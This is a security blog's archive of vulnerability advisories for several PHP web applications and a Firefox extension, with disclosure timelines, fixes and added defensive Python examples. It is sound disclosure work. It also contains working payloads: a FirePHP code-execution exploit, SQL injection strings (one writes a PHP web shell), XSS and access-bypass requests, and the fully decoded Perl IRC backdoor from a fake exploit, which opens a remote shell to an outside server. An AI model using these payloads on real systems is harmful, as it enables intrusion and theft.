Results tagged “vulnerability” from Just Another Hacker

20130417 - : FirePHP firefox plugin remote code execution
JAHx132 -

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: ]

--- Vulnerability description ---
The extension does not sufficiently validate cell names in the array data it receives from the remote
host, so a cell name containing script is executed in the chrome-privileged context when a user
inspects the malicious data in FirePHP.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP -
Affected versions: All versions prior to 0.7.2

--- Proof of Concept ---
/*******************************************************************************
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul -                                                      *
 * Greetz to @bcoles urbanadventurer @malerisch                                *
 *******************************************************************************/

// XUL code to launch calc.exe. Note: the XPCOM contract ID strings inside
// Components.classes[...] and the start of the process.run() call are
// truncated in this copy of the advisory.
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\";1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\";1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= ',[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data as a Wildfire frame: <length>|<json>|
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
  <title>FirePHP Firefox plugin RCE PoC</title>
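
The Wildfire framing the PoC builds by hand (`<length>|<json>|` inside an X-Wf-1-1-1-N header) and the check the extension was missing, as an added Python example. This is not FirePHP's or the advisory author's code: the frame/unframe functions follow the length-prefix format shown in the PoC above, and the key walk models the one fact the advisory establishes, that object keys in the dump are attacker-controlled text which must never reach the chrome-privileged panel unescaped. The sample messages are constructed.

```python
import json

def wf_frame(message) -> str:
    """Encode a message the way a FirePHP-enabled server does: <byte length>|<json>|."""
    body = json.dumps(message, separators=(",", ":"))
    return f"{len(body.encode())}|{body}|"

def wf_unframe(header_value: str):
    """Decode one X-Wf-1-1-1-N header value, verifying the length prefix first so a
    truncated or tampered frame is rejected before any JSON is parsed."""
    length, sep, rest = header_value.partition("|")
    if not sep or not rest.endswith("|"):
        raise ValueError("malformed Wildfire frame")
    body = rest[:-1]
    if int(length) != len(body.encode()):
        raise ValueError("frame length mismatch")
    return json.loads(body)

_MARKUP = set("<>\"'&")

def unsafe_keys(obj, path=()):
    """Walk a decoded message and return the path of every object key that carries
    markup characters. Values are usually escaped by log viewers; keys are the part
    the vulnerable extension trusted, so they are what this check looks at."""
    found = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            if _MARKUP & set(key):
                found.append(path + (key,))
            found.extend(unsafe_keys(value, path + (key,)))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            found.extend(unsafe_keys(value, path + (i,)))
    return found

def check_header(header_value: str):
    """Offending key paths for a raw header value; an empty list means no markup in keys."""
    return unsafe_keys(wf_unframe(header_value))

# Constructed samples modelled on the advisory's dump: a benign header table and
# one whose key smuggles script into the panel.
BENIGN = {"RequestHeaders": {"Host": "example.test", "Accept": "*/*"}}
HOSTILE = {"RequestHeaders": {"Host": "example.test",
                              "UR<script>alert(1)</script>": "PWNT"}}

if __name__ == "__main__":
    for msg in (BENIGN, HOSTILE):
        hv = wf_frame(msg)
        print("X-Wf-1-1-1-1:", hv[:70] + ("..." if len(hv) > 70 else ""))
        print("  unsafe keys:", check_header(hv))
```

FirePHPCore splits long messages over several numbered headers; this example handles a single-part frame only. The point of `unsafe_keys` is where it runs: on the decoded structure, before rendering, rather than as a regex over the raw header, which a `\u003c` escape in the JSON would slip past.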

--- Solution ---
Upgrade to version 0.7.2

--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email

20130212 - : httpdx multiple access control bypass
JAHx131 -

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: ]

--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            realm="Stuff for admin only!"
As long as the request does not match these static strings, but the path still resolves to the same
file, you can access the content.

Additionally, as the server doesn't support the traditional binding of virtual hosts to network
interfaces, virtual-host-specific behaviour must be configured through similar string matching:
    if<%HTTP_HOST% != "" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtual host remotely, just set your Host: header to localhost.
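
The matching flaw, as an added Python model (not httpdx code): the comparison is done against the raw REQUEST_URI, while the file system opens the decoded, normalised path. How httpdx's trailing `*` wildcard behaves is inferred from the two configuration examples above and modelled with `fnmatch`; the deny/auth patterns are the ones quoted, and the fix shown is to canonicalise before matching.

```python
import fnmatch
import posixpath
from urllib.parse import unquote

def httpdx_match(pattern: str, value: str) -> bool:
    """Assumed model of if<%VAR% == "literal*">: a literal with a trailing '*' wildcard."""
    return fnmatch.fnmatchcase(value, pattern)

def canonical_path(request_uri: str) -> str:
    """What the file system will actually open: drop the query string, percent-decode
    until stable (catches double encoding), collapse repeated slashes and resolve
    '.' and '..' without climbing above the root."""
    path = request_uri.split("?", 1)[0]
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    path = "/" + path.lstrip("/")            # posixpath.normpath keeps a leading '//'
    return posixpath.normpath(path)

# The two default-config rules quoted above.
DENY_PATTERNS = ["/data/users.txt*"]
AUTH_PATTERNS = ["/admin.html*"]

def access_decision(request_uri: str, canonicalise: bool) -> str:
    """'deny', 'auth' or 'allow'. canonicalise=False reproduces the bug (match the raw
    URI); canonicalise=True matches the path that will be served."""
    subject = canonical_path(request_uri) if canonicalise else request_uri
    if any(httpdx_match(p, subject) for p in DENY_PATTERNS):
        return "deny"
    if any(httpdx_match(p, subject) for p in AUTH_PATTERNS):
        return "auth"
    return "allow"

def host_is_local(host_header: str) -> bool:
    """Model of if<%HTTP_HOST% == {localhost,127.*.*.*}>. The value is whatever the
    client sent, so a remote client passes simply by sending Host: localhost."""
    return any(fnmatch.fnmatchcase(host_header, p) for p in ("localhost", "127.*.*.*"))

if __name__ == "__main__":
    for uri in ("/admin.html", "/%2fadmin.html", "/./admin.html",
                "/data/../data/users.txt", "/data/%2575sers.txt", "/data//users.txt?x=1"):
        print(f"{uri:28} raw={access_decision(uri, False):5} canonical={access_decision(uri, True)}")
    print("Host: localhost from a remote client passes:", host_is_local("localhost"))
```

Canonicalising the URI is necessary but only half of it: a Host-header check is not a network-origin check, and the `127.*.*.*` pattern only ever sees what the client typed. Binding the admin virtual host to the loopback interface, or checking the peer address, is the control that the configuration language here cannot express.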

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx -
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.

--- Solution ---
The software appears to be abandoned and the same versions suffer from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

20121017 - : Symphony cms - Multiple vulnerabilities
JAHx122 -

Symphony is an XSLT-powered open source content management system.
[ Taken from: ]

--- Vulnerability description ---
Symphony-cms version 2.3 contains several vulnerabilities, ranging in severity from low to high,
which together can result in complete compromise by an unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony -
Affected versions: 2.3 (and possibly earlier)

--- Local path disclosure ---
Direct requests to library files disclose the full local file path if PHP is configured to
display errors, because the library scripts rely on a path constant declared in global scope
outside the library script.


--- User enumeration ---
The retrieve password URL http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table, an attacker can log in to their account by brute forcing a key of [0-9A-F]^8 length.

The URL is http://host/path/symphony/login/[token]/, e.g. http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".

--- Cross site scripting ---
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

Submit form with email address:

The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.


The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.


--- Blind sql injection ---
The username field in the author's detail page is not sufficiently filtered when checking
whether the username already exists in the system, resulting in blind SQL injection.

Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email

20120831 - : PHP Shell Detector - Cross site scripting
JAHx121 -

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main feature is that if you're not sure about a suspicious file, you may send
it to the team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: ]

--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha -
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file detected by the PSD script, ie:
root@localhost:~# mv htaccess.php  \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file.

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

Quick and dirty exploit vetting

Got some exploit code that you didn't write? You had better check it first, especially as I've seen a few people link to fake exploits lately. One example is a supposed winnuker I came across, which sports the following payload:

Never run an exploit if you didn't write it or don't understand the shellcode. I cannot stress that enough. Anyway, the exploit code has a bad smell to it, so I do a lazy check of the shell code:
~$ echo -e "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
If you work with hex or shellcode regularly you might have already worked out that the shellcode was in fact text (the large number of \x20 is a pretty dead giveaway). As you can see, a quick check of the shellcode reveals that this is in fact a fake exploit that offers a remote shell to the entire efnet #darknet channel. If the shellcode is binary then you'll need to do some more analysis, but for most fake exploits the above technique usually reveals them.

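
The same lazy check without running anything, as an added Python example (not the post's own tooling): decode the `\xNN` escapes, measure how much of the result is printable, and look for interpreter and IRC tell-tales. The two samples are constructed: the first is the opening bytes of the payload above, the second a classic 23-byte Linux x86 execve("/bin/sh") stub included only so that real binary code is in the comparison.

```python
import re
import string

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def decode_escapes(blob: str) -> bytes:
    """Collect every \\xNN escape in a pasted payload (quotes, whitespace and line
    breaks between them are ignored) and return the raw bytes: the result of the
    echo -e above, without handing the bytes to a shell."""
    return bytes(int(h, 16) for h in _ESCAPE.findall(blob))

# Bytes accepted as "text": ASCII printable plus tab, newline and carriage return.
_TEXT_BYTES = set(string.printable.encode()) - {0x0B, 0x0C}

def printable_ratio(data: bytes) -> float:
    return sum(b in _TEXT_BYTES for b in data) / len(data) if data else 0.0

# Substrings whose presence in "shellcode" means it is really a script or a bot.
_TELLTALES = (b"#!", b"perl", b"python", b"/bin/sh", b"bash",
              b"IO::Socket", b"6667", b"NICK ", b"JOIN ")

def classify(blob: str) -> dict:
    """Cheap triage. 'text' means read it as source before doing anything else;
    'binary' means it needs disassembly or a sandbox, not trust."""
    data = decode_escapes(blob)
    ratio = printable_ratio(data)
    return {
        "bytes": len(data),
        "printable": round(ratio, 3),
        "flags": [t.decode() for t in _TELLTALES if t in data],
        "verdict": "text" if ratio > 0.9 else "binary",
        "preview": data[:40],
    }

# Constructed samples (see lead-in). FAKE_0DAY decodes to '#!/usr/bin/perl\n$chan="#darknet";'.
FAKE_0DAY = (r"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
             r"\x24\x63\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b")
REAL_SHELLCODE = (r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
                  r"\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

if __name__ == "__main__":
    for name, blob in (("fake", FAKE_0DAY), ("real", REAL_SHELLCODE)):
        print(name, classify(blob))
```

The printable ratio is a heuristic in both directions: alphanumeric-encoded shellcode is almost entirely printable and still binary code, and a fake can carry a genuine binary stage after a readable stub. A "text" verdict tells you to read the script; a "binary" verdict tells you the check above is not enough.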
20110713 - : Chyrp - Multiple vulnerabilities
JAHx113 -

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern.
[ Taken from: ]

--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
The javascript.php xss can also be invoked through rewrite rules using the following querystring -

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a PHP gotcha: the return value of strpos is used directly in an if statement, and a match
at position 0 is falsy, so a traversal sequence at the very start of the string is treated as no match.

--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

Append ;*.php to the file_types list in the script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using an intercepting proxy:
<script type="text/javascript">
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
upload_complete_handler : uploadComplete
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

20110525 - : Cross site scripting in Movable Type
JAHx112 -

Movable Type is a professional publishing platform
[ Taken from: ]

--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd -
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x

--- Proof of Concept ---
"><script>alert(document.cookie)</script>&logout=1&entry_id=

--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36( with Professional Pack, Community Pack)
* Movable Type 5.05( with Professional Pack, Community Pack)
* Movable Type 5.1( with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

20110424 - : Symphony-cms blind sql injection
JAHx111 -

Symphony is a web-based content management system (CMS) that enables users to create and
manage websites and web applications of all shapes and sizes, from the simplest of blogs to
bustling news sites and feature-packed social networks.
[ Taken from: ]

--- Vulnerability description ---
The symphony cms login page does not sufficiently filter user supplied variables used in a
SQL statement, resulting in a blind sql injection vulnerability. The vulnerable code is located at:
content.login.php-270-$sql = "SELECT t1.`id`, t1.`email`, t1.`first_name`
content.login.php-271- FROM `tbl_authors` as t1, `tbl_forgotpass` as t2
content.login.php:272: WHERE t2.`token` = '".$_REQUEST['token']."' AND t1.`id` = t2.`author_id`
content.login.php-273- LIMIT 1";
content.login.php-275-$author = Symphony::Database()->fetchRow(0, $sql);

Discovered by: Eldar "Wireghoul" Marcussen
Type: Blind sql injection
Severity: Moderate
Release: Full
CVE: None
Vendor: Symphony-cms
Affected versions: 2.1.2 and possibly older versions

--- Proof of Concept ---
The following example will reset the password of the admin user which was created during installation
(id 1) and send an email to '' with the username and new password.
'+union+select+id,'',username+from+tbl_authors+where+id+=1+--+

We are aided by the following code:
lib/toolkit/class.mysql.php:251:if($this->_connection['tbl_prefix'] != 'tbl_'){
lib/toolkit/class.mysql.php:252: $query = preg_replace('/tbl_(\S+?)([\s\.,]|$)/', $this->_connection['tbl_prefix'].'\\1\\2', $query);
which turns our tbl_authors into the appropriately prefixed table name. This essentially negates the use
of a custom prefix for tables.

--- Solution ---
Upgrade to version 2.2

--- Disclosure time line ---
24-Apr-2011 - Public disclosure

20101028 - : Multiple vulnerabilities in Feindura CMS
JAHx104 -

Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: ]

--- Vulnerability description ---
Feindura CMS suffers from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned directly from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting in arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
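
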